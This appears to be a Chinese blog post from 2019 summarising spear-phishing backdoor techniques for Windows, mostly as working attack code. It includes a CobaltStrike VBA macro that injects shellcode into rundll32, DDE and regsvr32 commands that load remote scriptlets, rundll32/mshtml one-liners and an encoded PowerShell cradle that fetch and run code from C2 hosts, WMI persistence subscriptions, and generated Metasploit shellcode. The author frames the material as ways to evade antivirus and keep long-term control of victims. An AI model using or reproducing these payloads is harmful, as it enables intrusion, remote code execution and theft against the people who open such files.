@Author: Patrilic
@Time: 2019-07-18 11:20:33

[toc]
鱼叉攻击,作为一种常见的攻击形式,中心思想就是将shellcode以各种形式进行伪装,然后诱使受害者启动程序,利用C2服务器进行远程命令执行

鱼叉攻击的难点:

  1. 信任伪造 – 常见的有swaks伪造邮件,DNS劫持,改写被信任网站等
  2. 免杀 – 能规避市面上大多数杀毒软件,不被发现
  3. 维持进程 – 长期控制,,开机自启
  4. 不暴露 – 不落地,依附进程,certutil等

本文意在总结一些较为常见的利用方式,不是很注重文笔,看看就好,一些脚本是直接copy大手子@3gstudent师傅的,然后关于类似与CobaltStrike的Spear phish以及Nginx的玩法,单独进行总结

0x00 Office

Office Macro

Office文档内置宏,可利用VB远程命令执行回弹到C2服务器
👇由CobaltStrike生成的Macro病毒样本
0ea9ced974025abd297e31f79a2624bb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type

Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

#If VBA7 Then
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

Sub Auto_Open()
Dim myByte As Long, myArray As Variant, offset As Long
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String

#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If
myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _
13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _
-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _
-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,-46,4,0,0,83,80,104,87,-119,-97, _
-58,-1,-43,-21,112,91,49,-46,82,104,0,2,64,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _
104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _
-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _
-1,-1,47,74,112,110,52,0,71,-37,19,-87,58,-110,11,66,63,40,-36,-114,-75,-101,62,108,29,-115,-75,-106,35,-3,71,126,24,-107,101,80,116,13,70,52, _
101,6,59,-12,-45,32,103,-104,10,62,77,18,-84,12,58,23,80,56,-75,32,-39,8,-80,107,-43,108,71,63,20,41,-82,-42,23,58,-126,98,-100,-108,-126,76, _
-44,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,57,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,49,59,32,84,114,105,100,101,110,116,47,53,46,48,59,32,66,79, _
73,69,57,59,69,78,85,83,77,83,69,41,13,10,0,53,-24,107,-26,-93,106,-40,-71,-105,-127,-22,100,-16,117,-9,83,112,-101,60,-4,105,72,-127,96,-60, _
-29,27,-62,-29,98,-95,-56,-46,-6,-57,-39,7,23,-70,101,-16,86,-85,-15,25,102,48,-46,-118,-62,1,-19,85,56,18,-105,41,124,102,116,-54,50,-67,81,-20, _
40,-19,-52,101,6,116,118,-128,-118,-9,-46,-96,-122,116,-70,107,-54,-78,59,119,-51,-52,5,96,53,-9,-60,102,-96,109,-90,-122,-92,-81,34,-70,-106,10,7,121, _
-6,-5,-12,107,-44,73,-31,52,87,-89,13,77,-121,-68,-37,74,-23,54,59,-122,79,66,65,-39,58,121,-100,20,53,28,27,-15,29,52,-107,127,-89,40,-4,-122, _
-73,-101,75,-64,-59,111,105,16,79,-121,7,33,-121,58,125,79,59,31,-97,-45,25,105,90,-99,6,38,74,-22,86,17,-99,-58,-36,55,5,-96,-109,48,42,-66, _
-23,-116,-38,-13,-33,89,30,32,90,53,11,119,118,-33,-48,77,24,-76,-11,44,50,-68,-127,-70,-43,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _
104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _
-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,52,53,46,51,50,46,55,56,46,49,49,55,0,111,-86,81,-61)
If Len(Environ("ProgramW6432")) > 0 Then
sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
Else
sProc = Environ("windir") & "\\System32\\rundll32.exe"
End If

res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
For offset = LBound(myArray) To UBound(myArray)
myByte = myArray(offset)
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
Next offset
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub

代码分析: sProc为rundll32.exe的路径
然后RunStff -> CreateProcessA
使用rundll32创建进程,然后使用WriteStuff注入shellcode(myArray)

PS: 同时也可用Msf 或者 Empire等工具生成Macro后门

Office DDE

Ctrl + F9 (Command + F9)可开启域
填入代码即可

1
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" \* MERGEFORMAT

15e498b5fb55042af504a1f99a898b91

联动MSF (web_delivery):

1
DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://192.168.0.1/A9IcXi.sct scrobj.dll"

这种方式回需要受害者确认打开进程,有一定风险

Excel IQY

IQY是一个Excel Web查询用到的东西,可以直接吧互联网上的东西打印到表中
数据->倒入数据->新建Web查询
cbc34d2ae7adb278d040ca16ff6e1df9

1
=cmd|'/c calc.exe '!A0

单引号内调用恶意程序
6ca2fc83266d62bb018fa05c8da71ce1

同样需要受害者确认打开进程

OLE

OLE - 外部对象
常见利用场景见CVE-2017-0199

UNC路径

UNC(Universal Naming Convention)
就是windows共享进行
经典用法:
https://github.com/0x09AL/WordSteal

插入UNC路径的图片窃取目标用户NTMLhash

Powerpoint Button

9524de25b9403cfff1df3282fc5b914c

5050e237bcc98ba0dfd904dfe9ffa4f7

e63764e020d99c4a5aececdf8cd5c887

CVE-2017-0199

利用rtf的特性,可以自启动加载OLE调用的外部组件,通过修改Server的MIME类型,让引用的RTF文档解析为HTA文件,执行命令
影响版本:
Office 2007,Office 2010,Office 2013,Office 2016

注意点:
使用Notepad++将生成的rtf文档里的
\object\objautlink\rsltpict替换为\object\objautlink\objupdate\rsltpict

至于修改File Server的MIME类型:
直接在Apache2的主配置中编辑:
AddType application/rtf .rtf

CVE-2017-8570

原理:利用RTF文档的Packager.dll搭配%temp%目录,将.sct以Packager对象存入,再用rtf文档去调用他,就可以达到利用.sct调用COM接口来执行命令的效果

https://github.com/klionsec/PhishingExploit/blob/master/CVE-2017-8570/packager_composite_moniker.py

0x01 Notepad++ dll后门

就是利用notepad++自带的import plugin功能,调用dll达到命令执行

400502f6e034cc52cd458c0c2451c407

3afea44ee05002f146cd03bebbf5141a

1877d5f999e0f057f910ad4e17d76273

应用场景: 伪造插件进行钓鱼

0x02 JSRAT

Javascript Backdoor

核心思路是利用rundll32.exe执行javascript代码

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(‘foo’);

所以,为什么可以执行呢?
JavaScript后门深层分析

JavaScript Phishing

利用DLL 加载 JS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
BOOL APIENTRY DllMain( HANDLE hModule, 
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
char *command="cmd.exe /c start rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new\%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://192.168.1.100/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new\%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
WinExec(command,SW_HIDE);
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

回弹到192.168.1.100的JSRat.ps1

利用 swf 加载 JS

同样的,利用msf自带 windows/exec模块生成shellcode
23adc6883f957f15da50e03cd6dfd4a0

利用Adobe Flash CS6编译生成swf,配合Adobe Flash Player漏洞即可RCE

利用 浏览器漏洞 加载 JS

CVE-2014-6332 等漏洞
利用页面执行VB Script

1
2
3
4
5
6
7
8
<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://192.168.174.136/connect"",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe"",0,true);}",0
end function
</script>

利用 VBS 加载 JS

利用VBS调用Wscript.shell,运行命令

1
2
set shell=createobject("wscript.shell")
shell.run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://192.168.174.136/connect"",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe"",0,true);}",0

利用 CHM 加载 JS

利用CHM的后门,加载JS

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

可执行calc.exe
替换为对应js代码即可
例如:
远程DownloadString JSRA 回连C2

1
powershell -ep bypass -enc PQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAzADoAOAAwADgAMQAvADEALwAnACkAOwAKAA==

生成 Shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
msf5 payload(windows/messagebox) > use windows/exec

msf5 payload(windows/exec) > set CMD rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://192.168.174.136/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}


msf5 payload(windows/exec) > generate -f c

/*
* windows/exec - 500 bytes
* http://www.metasploit.com
* VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
* CMD=rundll32.exe javascript:"\..\mshtml,RunHTMLApplication
";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.136/connect",false);try{h.Send();B=h.ResponseText;eva * l(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd
* /c taskkill /f /im rundll32.exe",0,true);}
*/
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78"
"\x65\x20\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x22\x5c"
"\x2e\x2e\x5c\x6d\x73\x68\x74\x6d\x6c\x2c\x52\x75\x6e\x48\x54"
"\x4d\x4c\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x20\x22"
"\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65"
"\x28\x29\x3b\x68\x3d\x6e\x65\x77\x25\x32\x30\x41\x63\x74\x69"
"\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x57\x69\x6e\x48"
"\x74\x74\x70\x2e\x57\x69\x6e\x48\x74\x74\x70\x52\x65\x71\x75"
"\x65\x73\x74\x2e\x35\x2e\x31\x22\x29\x3b\x68\x2e\x4f\x70\x65"
"\x6e\x28\x22\x47\x45\x54\x22\x2c\x22\x68\x74\x74\x70\x3a\x2f"
"\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x37\x34\x2e\x31\x33"
"\x36\x2f\x63\x6f\x6e\x6e\x65\x63\x74\x22\x2c\x66\x61\x6c\x73"
"\x65\x29\x3b\x74\x72\x79\x7b\x68\x2e\x53\x65\x6e\x64\x28\x29"
"\x3b\x42\x3d\x68\x2e\x52\x65\x73\x70\x6f\x6e\x73\x65\x54\x65"
"\x78\x74\x3b\x65\x76\x61\x6c\x28\x42\x29\x3b\x7d\x63\x61\x74"
"\x63\x68\x28\x65\x29\x7b\x6e\x65\x77\x25\x32\x30\x41\x63\x74"
"\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x57\x53\x63"
"\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c\x22\x29\x2e\x52\x75"
"\x6e\x28\x22\x63\x6d\x64\x20\x2f\x63\x20\x74\x61\x73\x6b\x6b"
"\x69\x6c\x6c\x20\x2f\x66\x20\x2f\x69\x6d\x20\x72\x75\x6e\x64"
"\x6c\x6c\x33\x32\x2e\x65\x78\x65\x22\x2c\x30\x2c\x74\x72\x75"
"\x65\x29\x3b\x7d\x00";

0x03 WSC

WSC : Windows Script
WSC是微软提供快速创建COM组建的途径
之前lcx师傅很火的一篇文章: 利用wsc创建asp后门

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0"?>    

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>

</component>
</package>

JS文件只需调用wsc即可

1
GetObject("script:C:\\testwsc\\test.wsc");

也可进行远程调用

1
GetObject("script:https://raw.githubusercontent.com/patrilic/Backdoors/master/Wsc_backdoor/test.wsc")

0x04 WMI Backdoor

WMI Backdoor - wooyun Drops

powershell 利用

1
2
3
不在Client和Server留下任何文件
不改动注册表
仅使用powershell实现

利用wmi无文件存储payload

1
2
3
4
5
6
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,
$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()

powershell 调用 javascript_backdoor

1
2
3
4
5
6
7
8
9
10
11
12
$filterName = 'filtP1'
$consumerName = 'consP1'
$Command ="GetObject(""script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test"")"


$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop

$WMIEventConsumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ScriptingEngine='JScript';ScriptText=$Command}

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

mof 调用 javascript_backdoor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
pragma namespace("\\\\.\\root\\subscription")    

instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP1";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 1";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consP1";
ScriptingEngine = "JScript";
ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")";
};

instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

类似的,也可以利用wmi执行其他后门程序,配合使用

具体的可以看这篇
http://www.anquan.us/static/drops/tips-8260.html

同时wmi也可使用

vbs
mof
C / C++
.Net
等方式进行执行

0x05 Lnk Backdoor

可参考evi1cg师傅的文章->Shortcut_Backdoor
快捷方式会执行目标里的文件
e6661303d9cae03727399d7ada045593

1
Shortcut_gen.exe test.txt test.lnk

这样点击test.lnk 就会执行test.txt中的命令

也可以使用evi1cg师傅的脚本->https://gist.github.com/Ridter/a360f94d8ac9a8c30227e3812dfbb329

0x06 Chm Backdoor

通用以上 #利用 CHM 加载 JS
不单可利用JS进行执行

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

利用Object标签,可执行各类shellcode
比如利用regsvr32 执行dll,利用mshta执行hta,直接运行powershell,VBS等等
前提当然是做好混淆和免杀

0x07 CPL Backdoor

CPL (Control Panel Item)
CPL文件本质上是DLL, 但是由于他包含CPLApplet函数,所以成为了一个windows可执行文件
但是虽然是可执行文件,其实是调用shell32.dll 来运行
调用的几种方式:

利用vbs调用cpl

1
2
3
Dim obj
Set obj = CreateObject("Shell.Application")
obj.ControlPanelItem("test.cpl")

利用js调用cpl

1
2
var a = new ActiveXObject("Shell.Application");
a.ControlPanelItem("c:\\test\\test.cpl");

同样,其实可以直接用msf生成一个dll文件,然后修改后缀为.cpl即可,但是存在一个弹窗提示程序兼容性问题
解决方式:手动编译reverse_tcp

参考:http://www.anquan.us/static/drops/tips-16042.html

0x08 Windows 利用Unicode 文件名反转

相当简单..
723d43d4d266bfe5a3c58768d476d090

插入RLO字符就可以进行文件名反转,然后可以换图片来更好的伪装
5633fd5aa8a0e32749abe83665490e9c

0x09 Winrar Backdoor

著名的CVE-2018-20250
还没分析过原理..献上学长的Exp
https://github.com/WyAtu/CVE-2018-20250

0x10 CVE-2018-4878

影响版本:
version <= 28.0.0.137
flask 溢出,配合脚本进行攻击就行..现在h5盛行,flash也快退休了

0x11 Nginx 反向代理

推一波passer6y
https://www.anquanke.com/post/id/150436
大概就是注册一个相近的域名,然后反代真实服务器,截断明文密码,进行钓鱼,单独分析一波 # Nginx 反向代理实战